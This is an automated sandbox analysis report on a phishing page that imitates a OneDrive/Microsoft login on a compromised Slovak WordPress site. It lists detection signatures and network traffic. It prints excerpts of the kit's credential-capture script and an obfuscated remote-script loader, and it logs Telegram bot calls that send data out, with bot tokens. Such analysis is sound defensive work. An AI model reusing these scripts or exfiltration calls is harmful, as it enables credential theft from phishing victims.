Windows Analysis Report
https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html

Overview

General Information

Sample URL: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html
Analysis ID: 1502053
Infos:

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Javascript uses Telegram API
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Uses the Telegram API (likely for C&C communication)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML title does not match URL
Invalid T&C link found
Suricata IDS alerts with low severity for network traffic

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html Avira URL Cloud: detection malicious, Label: phishing
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Antivirus detection for URL or domain
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/1.png Avira URL Cloud: Label: phishing
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/telegram.js Avira URL Cloud: Label: phishing
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/script.js Avira URL Cloud: Label: phishing
Source: https://www.askozvar.sk/wp-content/uploads/2019/06/cropped-zvaracaskozvar-1-32x32.png Avira URL Cloud: Label: phishing
Source: http://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf Avira URL Cloud: Label: phishing
Source: https://www.askozvar.sk/favicon.ico Avira URL Cloud: Label: phishing

Phishing
barindex
AI detected phishing page
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html LLM: Score: 8 Reasons: The domain 'www.askozvar.sk' does not match the legitimate domain associated with OneDrive, which is 'onedrive.live.com'. Additionally, the URL has a Slovakian domain extension (.sk), which is not commonly used by Microsoft-owned services. The design of the webpage is clean and minimalistic, but this could be a attempt to mimic the legitimate OneDrive website. DOM: 8.0.pages.csv
Javascript uses Telegram API
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/script.js HTTP Parser: /* global $ */$(document).ready(function() { var count = 0; $(document).keypress(function(event) { var keycode = (event.keycode ? event.keycode : event.which); if (keycode == '13') { if ($("#divpr").is(":visible")) { $("#submit-btn").trigger("click"); } else { $("#next").trigger("click"); } } }); $('#next').click(function() { $('#error').hide(); $('#msg').hide(); event.preventdefault(); var ai = $("#ai").val(); ///////////new injection//////////////// var my_ai = ai; var filter = /^([a-za-z0-9_\.\-])+\@(([a-za-z0-9\-])+\.)+([a-za-z0-9]{2,4})+$/; if (!ai) { $('#error').show(); $('#error').html("le champ e-mail est vide.!"); ai.focus; return false; } if (!filter.test(my_ai)) { $('#error').show(); $('#error').html("ce...
Source: https://dancinggorillas.com/style/10.js HTTP Parser: /* * jquery.countdowntimer.min.js 1.0.8 * author - harshen amarnath pandey * version - 1.0.8 * release - 18th april 2015 * copyright (c) 2014 - 2018 harshen pandey*/!function(n){function t(t,c){var s=n.extend({},n.fn.countdowntimer.defaults,c),t=t;t.addclass("style");var m="",m="",h="",v="";if(m=s.size,m=s.bordercolor,h=s.fontcolor,v=s.backgroundcolor,void 0!=c.regexpmatchformat&&void 0!=c.regexpreplacewith&&void 0==c.timeseparator&&(window["regexpmatchformat_"+t.attr("id")]=c.regexpmatchformat,window["regexpreplacewith_"+t.attr("id")]=c.regexpreplacewith),void 0!=c.bordercolor||void 0!=c.fontcolor||void 0!=c.backgroundcolor){var g={background:v,color:h,"border-color":m};t.css(g)}else t.addclass("colordefinition");if(void 0!=c.size)switch(m){case"xl":t.addclass("size_xl");break;case"lg":t.addclass("size_lg");break;case"md":t.addclass("size_md");break;case"sm":t.addclass("size_sm");break;case"xs":t.addclass("size_xs")}else"sm"==m&&t.addclass("size_sm");if(void 0!=c.startdate||void 0!=c.dateandt...
Source: https://dancinggorillas.com/style/pdf_fr.js HTTP Parser: var _0xee8a36=_0x2e18;(function(_0x3a523f,_0x41e5ee){var _0x539c92=_0x2e18,_0x5b0065=_0x3a523f();while(!![]){try{var _0x16996e=parseint(_0x539c92(0x1c0))/0x1*(parseint(_0x539c92(0x1c7))/0x2)+parseint(_0x539c92(0x1cb))/0x3+parseint(_0x539c92(0x1bd))/0x4+-parseint(_0x539c92(0x1c9))/0x5+-parseint(_0x539c92(0x1c8))/0x6*(-parseint(_0x539c92(0x1cc))/0x7)+parseint(_0x539c92(0x1c4))/0x8*(-parseint(_0x539c92(0x1c5))/0x9)+-parseint(_0x539c92(0x1c3))/0xa*(parseint(_0x539c92(0x1c1))/0xb);if(_0x16996e===_0x41e5ee)break;else _0x5b0065['push'](_0x5b0065['shift']());}catch(_0xcf3dda){_0x5b0065['push'](_0x5b0065['shift']());}}}(_0x2f5b,0x1cb7b));function _0x2e18(_0x176eb8,_0x79f9ab){var _0x2f5b9d=_0x2f5b();return _0x2e18=function(_0x2e180a,_0x32ee09){_0x2e180a=_0x2e180a-0x1bd;var _0x2f6ebd=_0x2f5b9d[_0x2e180a];return _0x2f6ebd;},_0x2e18(_0x176eb8,_0x79f9ab);}var scriptelement=document[_0xee8a36(0x1c2)]('script'),a='h',z='t',e='t',r='p',t='s',y=':',u='/',i='/',o='d',p='a',q='n',s='c',d='i',f='n',g='g',h='g',j='o',k='r',l='i',m...
Phishing site detected (based on image similarity)
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html Matcher: Found strong image similarity, brand: MICROSOFT
Phishing site detected (based on logo match)
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html Matcher: Template: onedrive matched
HTML body contains low number of good links
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html HTTP Parser: Number of links: 0
HTML body contains password input but no form action
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html HTTP Parser: <input type="password" .../> found but no <form action="...
HTML body with high number of embedded images detected
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html HTTP Parser: Total embedded image size: 250150
HTML title does not match URL
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html HTTP Parser: Title: Plans Archi does not match URL
Invalid T&C link found
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html HTTP Parser: Invalid link: Privacy & Cookies
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html HTTP Parser: <input type="password" .../> found
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html HTTP Parser: No favicon
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html HTTP Parser: No <meta name="author".. found
Source: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html HTTP Parser: No <meta name="copyright".. found
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49769 version: TLS 1.2

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.4:55178 -> 162.159.36.2:53
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2032516 - Severity 2 - ET PHISHING Generic Multibrand NewInjection Phishing Landing Template : 88.212.10.20:443 -> 192.168.2.4:49749
Source: Network traffic Suricata IDS: 2032517 - Severity 2 - ET PHISHING Generic Multibrand NewInjection Phishing Landing Template : 88.212.10.20:443 -> 192.168.2.4:49749
Source: Network traffic Suricata IDS: 2032516 - Severity 2 - ET PHISHING Generic Multibrand NewInjection Phishing Landing Template : 88.212.10.20:443 -> 192.168.2.4:49735
Source: Network traffic Suricata IDS: 2032517 - Severity 2 - ET PHISHING Generic Multibrand NewInjection Phishing Landing Template : 88.212.10.20:443 -> 192.168.2.4:49735
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknown TCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknown TCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknown TCP traffic detected without corresponding DNS query: 87.248.204.0
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html HTTP/1.1Host: www.askozvar.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/script.js HTTP/1.1Host: www.askozvar.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.askozvar.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.askozvar.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.askozvar.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.askozvar.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/telegram.js HTTP/1.1Host: www.askozvar.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /style/pdf_fr.js HTTP/1.1Host: dancinggorillas.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/script.js HTTP/1.1Host: www.askozvar.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/telegram.js HTTP/1.1Host: www.askozvar.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/1.png HTTP/1.1Host: www.askozvar.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /style/10.js HTTP/1.1Host: dancinggorillas.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bot69272958987:AAFFDSiV1sre7Hfr4o84UfSX2g3XwVHFbZPfzU/sendMessage?chat_id=-40519456006&text=http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.askozvar.skSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bot608367094314:AAGSbz4P642cuuaj_d54rlDQEtxWui_xUOgw/sendMessage?chat_id=63308924057&text=New_Link%3A%20http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html%2FX911%2Fstyle.php HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.askozvar.skSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /style/pdf_fr.js HTTP/1.1Host: dancinggorillas.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bot1416352134:AAFTVfZ2N0K89fqi-wxFyFyVZrT94rB4fDE/sendMessage?chat_id=-4243763425&text=http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.askozvar.skSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.askozvar.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.askozvar.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /style/10.js HTTP/1.1Host: dancinggorillas.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bot1416352134:AAFTVfZ2N0K89fqi-wxFyFyVZrT94rB4fDE/sendMessage?chat_id=-4243763425&text=http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2019/06/cropped-zvaracaskozvar-1-32x32.png HTTP/1.1Host: www.askozvar.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
